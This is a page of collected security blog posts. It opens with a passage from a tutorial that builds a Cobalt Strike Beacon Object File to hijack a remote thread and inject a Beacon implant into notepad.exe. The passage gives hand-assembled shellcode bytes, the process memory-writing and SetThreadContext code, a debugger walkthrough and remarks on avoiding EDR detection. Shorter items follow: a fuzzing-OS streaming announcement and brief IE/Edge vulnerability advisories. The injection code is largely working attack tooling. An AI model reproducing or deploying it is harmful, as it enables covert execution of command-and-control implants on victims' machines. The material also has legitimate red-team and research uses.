// Update counter with location buffer can be written to
i += sizeof(shellcodeOffset);

Although the above code practically represents what was said about, you can see that the size of a DWORD and the value of i are subtracted from the offset previously mentioned. This is because, the whole NtContinue routine is 64 bytes. By the time the code has finished executing the entire call instruction, a few things will have happened. The first being, the call instruction itself, 0xe8, will have been executed. This takes us from being at the beginning of our routine, byte 1/64, to the second byte in our routine, byte 2/64. The CreateThread routine, which we need to call, is now one byte closer than when we started - and this will affect our calculations. In the above set of instructions, this byte has been compensated for, by subtracting the already executed opcode (the current value of i). Additionally, four bytes are taken up by the actual offset itself, aDWORD, which is a 4 byte value. This means execution will now be at byte 5/64 (one byte for the opcode and four bytes for the DWORD). To compensate for this, the size of a DWORD has been subtracted from the total offset. If you think about it, this makes sense. By the time the call has finished executing, the CreateThread routine will be five bytes closer. If we used the original offset, we would have overshot the CreateThread routine by five bytes. Additionally, we update the i counter variable to let it know how many bytes we have written to the overall NtContinue routine. We will walk through all of these instructions inside of the debugger, once we have finished developing this small shellcode routine.

At this point, the NtContinue routine would have called the CreateThread routine. The CreateThread routine would have returned execution back to the NtContinue routine, and the next instructions in the NtContinue routine would execute.

The next few instructions are a bit of a “hacky” method to pass the first parameter, a pointer to our CONTEXT record, to the NtContinue function. We will use a call/pop routine, which is a very documented method and can be read about here and here. As we know, we are required to place the first value, for our purposes, into the RCX register - per the __fastcall calling convention. This means we need to calculate the address of the CONTEXT record somehow. To do this, we actually use another near call instruction in order to call the immediate byte after the call instruction.

// Near call instruction to call the address directly after, which is used to pop the pushed return address onto the stack with a RVA from the same page (call pushes return address onto the stack)
ntContinue[i++] = 0xe8;
ntContinue[i++] = 0x00;
ntContinue[i++] = 0x00;
ntContinue[i++] = 0x00;
ntContinue[i++] = 0x00;

The instruction this call will execute is the immediate next instruction to be executed, which will be a pop rcx instruction added by us. Additionally the value of i at this point is saved into a new variable called contextOffset.

// The previous call instruction pushes a return address onto the stack
// The return address will be the address, in memory, of the upcoming pop rcx instruction
// Since current execution is no longer at the beginning of the ntContinue routine, the distance to the CONTEXT record is no longer 64-bytes
// The address of the pop rcx instruction will be used as the base for RVA calculations to determine the distance between the value in RCX (which will be the address of the 'pop rcx' instruction) to the CONTEXT record
// Obtaining the current amount of bytes executed thus far
int contextOffset = i;

// __fastcall calling convention
// NtContinue requires a pointer to a context record and an alert state (FALSE in this case)
// pop rcx (get return address, which isn't needed for anything, into RCX for RVA calculations)
ntContinue[i++] = 0x59;

The purpose of this, is the call instruction will push the address of the pop rcx instruction onto the stack. This is the return address of this function. Since the next instruction directly after the call is pop rcx, it will place the value at RSP, which is now the address of the pop rcx instruction due to call POP_RCX_INSTRUCTION pushing it onto the stack, into the RCX register. This helps us, as now we have a memory address that is relatively close the the CONTEXT record, which will be located directly after the call to NtContinue.

Now, as we know, the original offset of the CONTEXT record from the very beginning of the entire NtContinue routine was 64-bytes. This is because we will copy the CONTEXT record directly after the 64-byte BYTE array, ntContinue, in our final buffer. Right now however, if we add 64-bytes, however, to the value in RCX, we will overshoot the CONTEXT record’s address. This is because we have executed quite a few instructions of the 64-byte shellcode, meaning we are now closer to the CONTEXT record, than we where when we started. To compensate for this, we can add the original 64-byte offset to the RCX register, and then subtract the contextOffset value, which represents the total amount of opcodes executed up until that point. This will give us the correct distance from our current location to the CONTEXT record.

// The address of the pop rcx instruction is now in RCX
// Adding the distance between the CONTEXT record and the current address in RCX
// add rcx, distance to CONTEXT record
ntContinue[i++] = 0x48;
ntContinue[i++] = 0x83;
ntContinue[i++] = 0xc1;

// Value to be added to RCX
// The distance between the value in RCX (address of the 'pop rcx' instruction) and the CONTEXT record can be found by subtracting the amount of bytes executed up until the 'pop rcx' instruction and the original 64-byte offset
ntContinue[i++] = sizeof(ntContinue) - contextOffset;

This will place the address of the CONTEXT record into the RCX register. If this doesn’t compute, don’t worry. In a brief moment, we will step through everything inside of WinDbg to visually put things together.

The next goal is to set the RaiseAlert function argument to FALSE, which is a value of 0. To do this, again, we will use bitwise XOR.

// xor rdx, rdx
// Set to FALSE
ntContinue[i++] = 0x48;
ntContinue[i++] = 0x31;
ntContinue[i++] = 0xd2;

All that is left now is to call NtContinue! Again, just like our call to CreateThread, we can resolve the address of the API inside of the current process and pass the return value to the remote process, as even though each process is mapped its own Windows DLLs, the addresses are the same across the system.

The mov rax instruction set is first.

// Place NtContinue into RAX
ntContinue[i++] = 0x48;
ntContinue[i++] = 0xb8;

We then resolve the address of NtContinue, Beacon Object File style.

// Although the thread is in a remote process, the Windows DLLs mapped to the Beacon process, although private, will correlate to the same virtual address
unsigned long long ntcontinueAddress = KERNEL32$GetProcAddress(KERNEL32$GetModuleHandleA("ntdll"), "NtContinue");

// Error handling. If NtContinue cannot be resolved, abort
if (ntcontinueAddress == NULL)
{
  BeaconPrintf(CALLBACK_ERROR, "Error! Unable to resolve NtContinue.\n", KERNEL32$GetLastError());
}

Using the custom mycopy function, we then can copy the address of NtContinue at the correct index within the BYTE array, based on the value of i.

// Copy the address of NtContinue function address to the NtContinue routine buffer
mycopy(ntContinue + i, &ntcontinueAddress, sizeof(ntcontinueAddress));

// Update the counter with the correct offset the next bytes should be written to
i += sizeof(ntcontinueAddress);

At this point, things are as easy as just allocating some stack space for good measure and calling the value in RAX, NtContinue!

// Allocate some space on the stack for the call to NtContinue
// sub rsp, 0x20
ntContinue[i++] = 0x48;
ntContinue[i++] = 0x83;
ntContinue[i++] = 0xec;
ntContinue[i++] = 0x20;

// call NtContinue
ntContinue[i++] = 0xff;
ntContinue[i++] = 0xd0;

All there is left now is the stack alignment routine inside of the call to CreateThread! This alignment is to ensure the stack pointer is 16-byte aligned when the call from the NtContinue routine invokes the CreateThread routine.

Will The Stars Align?

The following routine will perform bitwise AND with the stack pointer, to ensure a 16-byte aligned RSP value inside of the CreateThread routine, by clearing out the last 4 bits of the address.

// Create 4 byte buffer to perform bitwise AND with RSP to ensure 16-byte aligned stack for the call to shellcode
// and rsp, 0FFFFFFFFFFFFFFF0
stackAlignment[0] = 0x48;
stackAlignment[1] = 0x83;
stackAlignment[2] = 0xe4;
stackAlignment[3] = 0xf0;

After the stack alignment is completed, all there is left to do is invoke malloc to create a large buffer that will contain all of our custom routines, inject the final buffer, and call SetThreadContext and ResumeThread to queue execution!

// Allocating memory for final buffer
// Size of NtContinue routine, CONTEXT structure, stack alignment routine, and CreateThread routine
PVOID shellcodeFinal = (PVOID)MSVCRT$malloc(sizeof(ntContinue) + sizeof(CONTEXT) + sizeof(stackAlignment) + sizeof(createThread));

// Copy NtContinue routine to final buffer
mycopy(shellcodeFinal, ntContinue, sizeof(ntContinue));

// Copying CONTEXT structure, stack alignment routine, and CreateThread routine to the final buffer
// Allocation is already a pointer (PVOID) - casting to a DWORD64 type, a 64-bit address, in order to write to the buffer at a desired offset
// Using RtlMoveMemory for the CONTEXT structure to avoid casting to something other than a CONTEXT structure
NTDLL$RtlMoveMemory((DWORD64)shellcodeFinal + sizeof(ntContinue), &cpuRegisters, sizeof(CONTEXT));
mycopy((DWORD64)shellcodeFinal + sizeof(ntContinue) + sizeof(CONTEXT), stackAlignment, sizeof(stackAlignment));
mycopy((DWORD64)shellcodeFinal + sizeof(ntContinue) + sizeof(CONTEXT) + sizeof(stackAlignment), createThread, sizeof(createThread));

// Declare a variable to represent the final length
int finalLength = (int)sizeof(ntContinue) + (int)sizeof(CONTEXT) + sizeof(stackAlignment) + sizeof(createThread);

Before moving on, notice the call to RtlMoveMemory when it comes to copying the CONTEXT record to the buffer. This is due to mycopy being prototyped to access the source and destination buffers aschar* data types. However, RtlMoveMemory is prototyped to accept data types of VOID UNALIGNED, which indicates pretty much any data type can be used, which is perfect for us as CONTEXT is a structure, not a char*.

The above code creates a buffer with the size of our routines, and copies it into the routine at the correct offsets, with the NtContinue routine being copied first, followed by the preserved CONTEXT record of the hijacked thread, the stack alignment routine, and the CreateThread routine. After this, the shellcode is injected into the remote process.

First, VirtualAllocEx is called again.

// Inject the shellcode into the target process with read/write permissions
PVOID allocateMemory = KERNEL32$VirtualAllocEx(
  processHandle,
  NULL,
  finalLength,
  MEM_RESERVE | MEM_COMMIT,
  PAGE_EXECUTE_READWRITE
);

if (allocateMemory == NULL)
{
  BeaconPrintf(CALLBACK_ERROR, "Error! Unable to allocate memory in the remote process. Error: 0x%lx\n", KERNEL32$GetLastError());
}

Secondly, WriteProcessMemory is called to write the shellcode to the allocation.

// Write shellcode to the new allocation
BOOL writeMemory = KERNEL32$WriteProcessMemory(
  processHandle,
  allocateMemory,
  shellcodeFinal,
  finalLength,
  NULL
);

if (!writeMemory)
{
  BeaconPrintf(CALLBACK_ERROR, "Error! Unable to write memory to the buffer. Error: 0x%llx\n", KERNEL32$GetLastError());
}

After that, RSP and RIP are set before the call to SetThreadContext. RIP will point to our final buffer and upon thread restoration, the value in RIP will be executed.

// Allocate stack space by subtracting the stack by 0x2000 bytes
cpuRegisters.Rsp -= 0x2000;

// Change RIP to point to our shellcode and typecast buffer to a DWORD64 because that is what a CONTEXT structure uses
cpuRegisters.Rip = (DWORD64)allocateMemory;

Notice that RSP is subtracted by 0x2000 bytes. @zerosum0x0’s blog post on ThreadContinue adopts this feature, to allow breathing room on the stack in order for code to execute, and I decided to adopt it as well in order to avoid heavy troubleshooting.

After that, all there is left to do is to invoke SetThreadContext, ResumeThread, and free!

SetThreadContext

// Set RIP
BOOL setRip = KERNEL32$SetThreadContext(
  desiredThread,
  &cpuRegisters
);

// Error handling
if (!setRip)
{
  BeaconPrintf(CALLBACK_ERROR, "Error! Unable to set the target thread's RIP register. Error: 0x%lx\n", KERNEL32$GetLastError());
}

ResumeThread

// Call to ResumeThread()
DWORD resume = KERNEL32$ResumeThread(
  desiredThread
);

free

// Free the buffer used for the whole payload
MSVCRT$free(
  shellcodeFinal
);

Additionally, you should always clean up handles in your code - but especially in Beacon Object Files, as they are “sensitive”.

// Close handle
KERNEL32$CloseHandle(
  desiredThread
);
// Close handle
KERNEL32$CloseHandle(
processHandle
);

Debugger Time

Let’s use an instance of notepad.exe as our target process and attach it in WinDbg.

The PID we want to inject into is 7548 for our purposes. After loading our Aggressor Script developed earlier, we can use the command cThreadHijack 7548 TESTING, where TESTING is the name of the HTTP listener Beacon will interact with.

There we go, our BOF successfully ran. Now, let’s examine what we are working with in WinDbg. As we can see, the address of our final buffer is shown in the Current RIP: 0x1f027f20000 output line. Let’s view this in WinDbg.

Great! Everything seems to be in place. As is shown in the mov rax,offset ntdll!NtContinue instruction, we can see our NtContinue routine. The beginning of the NtContinue routine should call the address of the stack alignment and CreateThread shellcode, as mentioned earlier in this blog post. Let’s see what the address 0x000001f027f20510 references, which is the memory address being called.

Perfect! As we can see by the and rsp, 0FFFFFFFFFFFFFFFF0 instruction, along with the address of KERNEL32!CreateThreadStub, the NtContinue routine will first call the stack alignment and CreateThread routines. In this case, we are good to go! Let’s start now walking through execution of the code.

Upon SetThreadContext being invoked, which changes the RIP register to execute our shellcode, we can see that execution has reached the first call, which will invoke the stack alignment and CreateThread routines. Stepping through this call, as we know, will push a return address onto the stack. As mentioned previously, this will be the address of that next call 0x000001f027f2000a instruction. When the CreateThread routine returns, it will return to this address. After stepping through the instruction, we can see that the address of the next call is pushed onto the stack.

Execution then reaches the bitwise AND instruction. As we can see from the above image, and rsp, 0FFFFFFFFFFFFFFF0 is redundant, as the stack pointer is already 16-byte aligned (the last 4 bits are already set to 0). Stepping through the bitwise XOR operations, RCX and RDX are set to 0.

As we know from the CreateThread prototype, the lpStartAddress parameter is a pointer to our shellcode. Looking at the above image, we can see the third argument, which will be loaded into R8, is 0x1f027ee0000. Unassembling this address in the debugger discloses this is our Beacon implant, which was injected earlier! TO verify this, you can generate a raw Beacon stageless artifact in Cobalt Strike manually and run it through hexdump to verify the first few opcodes correspond.

After stepping through the instruction, the value is loaded into the R8 register. The next instruction sets R9 to 0 via xor r9, r9.

Additionally, [RSP + 0x20] and [RSP + 0x28] are set to 0, by copying the value of R9, which is now 0, to these locations. Here is what [RSP + 0x20] and [RSP + 0x28] look like before the mov [rsp + 0x20], r9 and mov [rsp + 0x28], r9 instructions and after.

After, CreateThread is placed into RAX and is called. Note CreateThread is actually CreateThreadStub. This is because most former kernel32.dll functions were placed in a DLL called KERNELBASE.DLL. These “stub” functions essentially just redirect execution to the correct KERNELBASE.dll function.

Stepping over the function, with p in WinDbg, places the CreateThread return value, into RAX - which is a handle to the local thread containing the Beacon implant.

After execution of our NtContinue routine is complete, we will receive the Beacon callback as a result of this thread.

Additionally, we can see that RSP is set to the first “real” instruction of our NtContinue routine. A ret instruction, which is what is in RIP currently, will take the stack pointer (RSP) and place it into RIP. Executing the return redirects execution back to the NtContinue routine.

As we can see in the image above, the next call instruction calls the pop rcx instruction. This call instruction, when executed, will push the address of the pop rcx instruction onto the stack, as a return address.

Executing the pop rcx instruction, we can see that RCX now contains the address, in memory, of the pop rcx instruction. This will be the base address used in the RVA calculations to resolve the address of the preserved CONTEXT record.

To verify if our offset is correct, we can use .cxr in WinDbg to divulge if the contiguous memory block located at RCX + 0x36 is in fact a CONTEXT record. 0x36 is chosen, as this is the value currently that is about to be added to RCX, as seen a few screenshots ago. Verifying with WinDbg, we can see this is the case.

If this would not have been the correct location of the CONTEXT record, this WinDbg extension would have failed, as the memory block would not have been parsed correctly.

Now that we have verified our CONTEXT record is in the correct place, we can perform the RVA calculation to add the correct distance to the CONTEXT record, meaning the pointer is then stored in RCX, fulfilling the PCONTEXT parameter of NtContinue.

Stepping through xor rdx, rdx, which sets the RaiseAlert parameter of NtContinue to FALSE, execution lands on the call rax instruction, which will call NtContinue.

Pressing g in the debugger then shows us quite a few of DLLs are mapped into notepad.exe.

This is the Beacon implant resolving needed DLLs for various function calls - meaning our Beacon implant has been executed! If we go back into Cobalt Strike, we can see we now have a Beacon in context of notepad.exe with the same PID of 7548!

Additionally, you will notice on the victim machine that notepad.exe is fully functional! We have successfully forced a remote thread to execute our payload and restored it, all in one go.

Final Thoughts

Obviously, this technique isn’t without its flaws. There are still IOCs for this technique, including invoking SetThreadContext, amongst other things. However, this does avoid invoking any sort of action that creates a remote thread, which is still useful in most situations. This technique could be taken further, perhaps with invoking direct system calls versus invoking these APIs, which are susceptible to hooking, with most EDR products.

Additionally, one thing to note is that since this technique suspends a thread and then resumes it, you may have to wait a few moments to even a few minutes, in order for the thread to get around to executing. Interacting with the process directly will force execution, but targeting Windows processes that perform execution often is a good target also to avoid long waits.

I had a lot of fun implementing this technique into a BOF and I am really glad I have a reason to write more C code! Like always: peace, love, and positivity :-).

FuzzOS

6 December 2020 at 23:11

Summary

We’re going to work on an operating system which is designed specifically for fuzzing! This is going to be a streaming series for most of December which will cover making a new operating system with a strong focus on fuzzing. This means that things like the memory manager, determinism, and scalability will be the most important parts of the OS, and a lot of effort will go into making them super fast!

When

Streaming will start sometime on Thursday, December 10th, probably around 18:00 UTC, but the streams will be at relatively random times on relatively random days. I can’t really commit to specific times!

Streams will likely be 4-5 days a week (probably M-F), and probably 8-12 hours in length. We’ll see, who knows, depends how much fun we have!

Where

You’ll be able to find the streams live on my Twitch Channel, and if you’re unlucky and miss the streams, you’ll be able to find the recordings on my YouTube Channel! Don’t forget to like, comment, and subscribe, of course.

What

So… ultimately, I don’t really know what all will happen. But, I can predict a handful of things that we’ll do. First of all, it’s important to note that these streams are not training material. There is no prepared script, materials, flow, etc. If we end up building something totally different, that’s fine and we’re just going with the flow. There is no requirement of completing this project, or committing to certain ways the project will be done. So… with that aside.

We’ll be working on making an operating system, specifically for x86-64 (Intel flavor processors at the start, but AMD should work in non-hypervisor mode). This operating system will be designed for fuzzing, which means we’ll want to focus on making virtual memory management extremely fast. This is the backbone of most performant fuzzing, and we’ll need to be able to map in, unmap, and restore pages as they are modified by a fuzz case.

To keep you on the edge of your toes, I’ll first start with the boring things that we have to do.

OS

We have to make an operating system which boots. We’re gonna make a UEFI kernel, and we might dabble in running it on ARM64 as most of our code will be platform agnostic. But, who knows. It’ll be a pretty generic kernel, I’m mainly going to develop it on bare metal, but of course, we’ll make sure it runs on KVM/Xen/Hyper-V such that it can be used in a cloud environment.

ACPI

We’re gonna need to write ACPI table parsers such that we can find the NUMA locality of memory and CPUs on the system. This will be critical to getting a high performance memory manager that scales with cores.

Multi-processing

Of course, the kernel will support multiple cores, as otherwise it’s kinda useless for compute.

10gbit networking + TCP stack

Since I never work with disks, I’m going to follow my standard model of just using the network as general purpose whatever. To do this, we’ll need 10gbit network drivers and a TCP stack such that we can communicate with the rest of a network. Nothing too crazy here, we’ll probably borrow some code from Chocolate Milk


Interesting stuff

Okay, that stuff was boring, lets talk about the fun parts!

Exotic memory model

Since we’ll be “snapshotting” memory itself, we need to make sure things like pointers aren’t a problem. The fastest, easiest, and best solution to this, is simply to make sure the memory always gets loaded at the same address. This is no problem for a single core, but it’s difficult for multiple cores, as they need to have copies of the same data mapped at the same location.

What’s the solution? Well of course, we’ll have every single core on the system running it’s own address space. This means there is no shared memory between cores (with some very, very minor execeptions). Not only does this lead to execeptionally high memory access performance (due to caches only being in the exclusive or shared states), but it also means that shared (mutable) memory will not be a thing! This means that we’ll do all of our core synchronization through message passing, which is higher latency in the best case than shared memory models, but with an advantage of scaling much better. As long as our messages can be serialized to TCP streams, that means we can scale across the network without any effort.

This has some awesome properties since we no longer need any locks to our page tables to add and remove entries, nor do we need to perform any TLB shootdowns, which can cost tens thousands of cycles.

I used this model in Sushi Roll, and I really miss it. It had incredibly good performance properties and forced a bit more thought about sharing information between cores.

Scaling

As with most things I write, linear scaling will be required, and scaling across the network is just implied, as it’s required for really any realistic application of fuzzing.

Fast and differential memory snapshotting

So far, none of these things are super interesting. I’ve had many OSes that do these things well, for fuzzing, for quite a long time. However, I’ve never made these memory management techniques into a true data structure, rather I use them as needed manually. I plan to make the core of this operating system, a combination of Rust procedural macros and virtual memory management tricks to allow for arbitrary data structure to be stored in a tree-shaped checkpointed structure.

This will allow for fast transitions between different state of the structure as they were snapshotted. This will be done by leveraging the dirty bits in the page tables, and creating an allocator that will allocate in a pool of memory which will be saved and restored on snapshots. This memory will be treated as an opaque blob internally, and thus it can hold any information you want, device state, guest memory state, register state, something completely unrelated to fuzzing, won’t matter. To handle nested structures (or more specifically, pointers in structures which are to be tracked), we’ll use a Rust procedural macro to disallow untracked pointers within tracked structures.

Effectively, we’re going to heavily leverage the hardware’s MMU to differentally snapshot, teleport between, and restore blobs of memory. For fuzzing, this is necessary as a way to hold guest memory state and register state. By treating this opaquely, we can focus on doing the MMU aspects really well, and stop worrying about special casing all these variables that need to be restored upon resets.

Linux emulator

Okay, so all of that is kinda to make room for developing high performance fuzzers. In my case, I want this mainly for a new rewrite of vectorized emulation, but to make it interesting for others, we’re going to implement a Linux emulator capable of running QEMU.

This means that we’ll be able to (probably staticially only) compile QEMU. Then we can take this binary, and load it into our OS and run QEMU in our OS. This means we can control the syscall responses to the requests QEMU makes. If we do this deterministically (we will), this means QEMU will be deterministic. Which thus means, the guest inside of QEMU will also be deterministic. You see? This is a technique I’ve used in the past, and works exceptionally well. We’ll definitely outperform Linux’s handling of syscalls, and we’ll scale better, and we’ll blow Linux away when it comes to memory management.

KVM emulator + hypervisor

So, I have no idea how hard this would be, but from about 5 minutes of skimming the interwebs, it seems that I could pretty easily write a hypervisor in my OS that emulates KVM ioctls. Meaning QEMU would just think KVM is there, and use it!

This will give us full control of QEMU’s determinism, syscalls, performance, and reset speeds… without actually having to modify QEMU code.

That’s it

So that’s the plan. An OS + fast MMU code + hypervisor + Linux emulator, to allow us to deterministically run anything QEMU can run, which is effectively everything. We’ll do this with performance likely into the millions of VM resets per second per core, scaling linearly with cores, including over the network, to allow some of the fastest general purpose fuzzing the world has ever seen :D

FAQ

Some people have asked questions on the internet, and I’ll post them here:

Hackernews Q1

Q:

Huh. So my initial response was, "why on earth would you need a whole OS for that", but memory snapshotting and improved virtual memory performance might actually be a good justification. Linux does have CRIU which might be made to work for such a purpose, but I could see a reasonable person preferring to do it from a clean slate. On the other hand, if you need qemu to run applications (which I'm really unclear about; I can't tell if the plan is to run stuff natively on this OS or just to provide enough system to run qemu and then run apps on linux on qemu) then I'm surprised that it's not easier to just make qemu do what you want (again, I'm pretty sure qemu already has its own memory snapshotting features to build on).

Of course, writing an OS can be its own reward, too:) 

A:

Oooh, wasn't really expecting this to make it to HN cause it was meant to be more of an announcement than a description.

But yes, I've done about 7 or 8 operating systems for fuzzing in the past and it's a massive performance (and cleanliness) cleanup. This one is going to be like an operating system I wrote 2-3 years ago for my vectorized emulation work.

To answer your QEMU questions, the goal is to effectively build QEMU with MUSL (just to make it static so I don't need a dynamic loader), and modify MUSL to turn all syscalls to `call` instructions. This means a "syscall" is just a call to another area, which will by my Rust Linux emulator. I'll implement the bare minimum syscalls (and enum variants to those syscalls) to get QEMU to work, nothing more. The goal is not to run Linux applications, but run a QEMU+MUSL combination which may be modified lightly if it means a lower emulation burden (eg. getting rid of threading in QEMU [if possible] so we can avoid fork())

The main point of this isn't performance, it's determinism, but that is a side effect. A normal syscall instruction involves a context switch to the kernel, potentially cr3 swaps depending on CPU mitigation configuration, and the same to return back. This can easily be hundreds of cycles. A `call` instruction to something that handles the syscall is on the order of 1-4 cycles.

While for syscalls this isn't a huge deal, it's even more emphasized when it comes to KVM hypercalls. Transitions to a hypervisor are very expensive, and in this case, the kernel, the hypervisor, and QEMU (eg. device emulation) will all be running at the same privilege level and there won't be a weird QEMU -> OS -> KVM -> other guest OS device -> KVM -> OS -> QEMU transition every device interaction.

But then again, it's mainly for determinism. By emulating Linux deterministically (eg. not providing entropy through times or other syscall returns), we can ensure that QEMU has no source of external entropy, and thus, will always do the same thing. Even if it uses a random-seeded hash table, the seed would be derived from syscalls, and thus, will be the same every time. This determinism means the guest always will do the same thing, to the instruction. Interrupts happen on the same instructions, context switches do, etc. This means any bug, regardless of how complex, will reproduce every time.

All of this syscall emulation + determinism I have also done before, in a tool called tkofuzz that I wrote for Microsoft. That used Linux emulation + Bochs, and it was written in userspace. This has proven incredibly successful and it's what most researchers are using at Microsoft now. That being said, Bochs is about 100x slower than native execution, and now that people have gotten a good hold of snapshot fuzzing (there's a steep learning curve), it's time to get a more performant implementation. With QEMU with get this with a JIT, which at least gets us a 2-5x improvement over Bochs while still "emulating", but even more value could be found if we get the KVM emulation working and can use a hypervisior. That being said, I do plan to support a "mode" where guests which do not touch devices (or more specifically, snapshots which are taken after device I/O has occurred) will be able to run without QEMU at all. We're really only using QEMU for device emulation + interrupt control, thus, if you take a snapshot to a function that just parses everything in one thread, without process IPC or device access (it's rare, when you "read" from a disk, you're likely just hitting OS RAM caches, and thus not devices), we can cut out all the "bloat" of QEMU and run in a very very thin hypervisor instead.

In fuzzing it's critical to have ways to quickly map and unmap memory as most fuzz cases last for hundreds of microseconds. This means after a few hundred microseconds, I want to restore all memory back to the state "before I handled user input" and continue again. This is extremely slow in every conventional operating system, and there's really no way around it. It's of course possible to make a driver or use CRIU, but these are still not exactly the solution that is needed here. I'd rather just make an OS that trivially runs in KVM/Hyper-V/Xen, and thus can run in a VM to get the cross-platform support, rather than writing a driver for every OS I plan to use this on.

Stay cute, ~gamozo 

Social

I’ve been streaming a lot more regularly on my Twitch! I’ve developed hypervisors for fuzzing, mutators, emulators, and just done a lot of fun fuzzing work on stream. Come on by!

Follow me at @gamozolabs on Twitter if you want notifications when new blogs come up. I often will post data and graphs from data as it comes in and I learn!

Tivoli Madness

18 November 2020 at 15:40
By: voidsec

TL; DR: this blog post serves as an advisory for both: CVE-2020-28054: An Authorization Bypass vulnerability affecting JamoDat – TSMManager Collector v. <= 6.5.0.21 A Stack Based Buffer Overflow affecting IBM Tivoli Storage Manager – ITSM Administrator Client Command Line Administrative Interface (dsmadmc.exe) Version 5, Release 2, Level 0.1. Unfortunately, after I had one of […]

The post Tivoli Madness appeared first on VoidSec.

MSIE 11 garbage collector attribute type confusion

5 March 2021 at 18:05

(MS16-063, CVE-2016-0199)

With MS16-063 Microsoft has patched CVE-2016-0199: a memory corruption bug in the garbage collector of the JavaScript engine used in Internet Explorer 11. By exploiting this vulnerability, a website can causes this garbage collector to handle some data in memory as if it was an object, when in fact it contains data for another type of value, such as a string or number. The garbage collector code will use this data as a virtual function table (vftable) in order to make a virtual function call. An attacker has enough control over this data to allow execution of arbitrary code.

MS Edge Tree::ANode::IsInTree use-after-free (MemGC) & Abandonment

5 March 2021 at 18:05

A specially crafted Javascript inside an HTML page can trigger a use-after-free bug in Tree::ANode::IsInTree or a breakpoint in Abandonment::InduceAbandonment in Microsoft Edge. The use-after-free bug is mitigated by MemGC: if MemGC is enabled (which it is by default) the memory is never freed. This effectively prevents exploitation of the issue. The Abandonment appears to be triggered by a stack exhaustion bug; the Javascript creates a loop where an event handler triggers a new event, which in turn triggers the event handler, etc.. This consumes a stack space until there is no more stack available. Edge does appear to be able to handle such a situation gracefully under certain conditions, but not all. It is easy to avoid those conditions to force triggering the Abandonment.

The interesting thing is that this indicates that the assumption that "hitting Abandonment means a bug is not a security issue" may not be correct in all cases.

MS Edge CDOMTextNode::get_data type confusion

5 March 2021 at 18:05

(MS16-002, CVE-2016-0003)

Specially crafted Javascript inside an HTML page can trigger a type confusion bug in Microsoft Edge that allows accessing a C++ object as if it was a BSTR string. This can result in information disclosure, such as allowing an attacker to determine the value of pointers to other objects and/or functions. This information can be used to bypass ASLR mitigations. It may also be possible to modify arbitrary memory and achieve remote code execution, but this was not investigated.

MSIE 9-11 MSHTML PROPERTYDESC::HandleStyleComponentProperty out-of-bounds read

5 March 2021 at 18:05

(MS16-104, CVE-2016-3324)

A specially crafted web-page can cause Microsoft Internet Explorer 9-11 to assume a CSS value stored as a string can only be "true" or "false". To determine which of these two values it is, the code checks if the fifth character is an 'e' or a '\0'. An attacker that is able to set it to a smaller string can cause the code to read data out-of-bounds and is able to determine if a WCHAR value stored behind that string is '\0' or not.

❌